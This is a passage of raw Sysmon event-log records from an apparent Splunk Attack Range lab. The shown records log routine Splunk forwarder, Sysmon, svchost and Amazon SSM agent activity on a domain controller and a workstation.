Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BA70CD8AEB0606FB75EE4F77C5E61C,SHA256=2A15D616F13E2B37FD28234A11B70C82A6639B52D8F2E4AFA1E5F80E62F8F3FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:57.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AFE2D2F535B76D5FFB44AE3D97ED605,SHA256=CDA0771C728F854B44A9ABB3824EA0EE95EFE09900ED09159A7B895406A29C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081802Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:57.434{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=515C243D4E9122CE6CE25D5F7FA7F2BA,SHA256=BE0C31E148E33247A398660CBEC69011E7A734B531F6C9B0DCA703B56D9953DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.732{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5248B814E722BCAE4FCED3D8F13A58EF,SHA256=633AD74F8DEA1E8EA871A181C9DB63D62396024F09D3A812FF97A5DC5C2D23D2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081805Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2DA-615A-5601-00000000FD01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081804Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.997{2FDD8D40-B2DA-615A-5601-00000000FD01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081803Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.434{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AF1C101C625E2001A829F324D5D65F4,SHA256=A5CC642BEC83953784ED2F1E2087F00587374B89E67E32A29F6507B8DABF8439,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DA-615A-DB01-00000000FC01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B2DA-615A-DB01-00000000FC01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.685{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DA-615A-DB01-00000000FC01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:58.686{58E9C193-B2DA-615A-DB01-00000000FC01}4864C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000103898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:57.095{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49560-false10.0.1.12-8089- 23542300x8000000000000000103919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.764{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D500AAA1CD69091A91F1A45B6DDFF65,SHA256=89A75E380E096ED477C744D65310E545DF79A3AA93240A6C3873EB51B79C1B78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.764{58E9C193-B2DB-615A-DC01-00000000FC01}53445424C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081818Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:59.675{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-025MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081817Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:59.438{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC232AB8B45AE4761A745737D6F06AC,SHA256=F0269ACD9F834569E1C0A45648286C8CDFC31B5DCD63636D90EAD5446A7E8AC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B2DB-615A-DC01-00000000FC01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B2DB-615A-DC01-00000000FC01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B2DB-615A-DC01-00000000FC01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.592{58E9C193-B2DB-615A-DC01-00000000FC01}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BB5C26FF63453FA399F5BC9F40D00A8,SHA256=F603B01535EB5CE821F8BB87BCCDE794698E70125C877DAD3734A243FEB6CA59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:52:59.123{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A54613F36A89C57A5901941342807E83,SHA256=E99179DF7186F0732B7AD9CA61B004CF3B89764D538CB99519827A838867530E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081816Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2DA-615A-5601-00000000FD01}1444C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081815Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081814Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:52:58.996{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081813Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 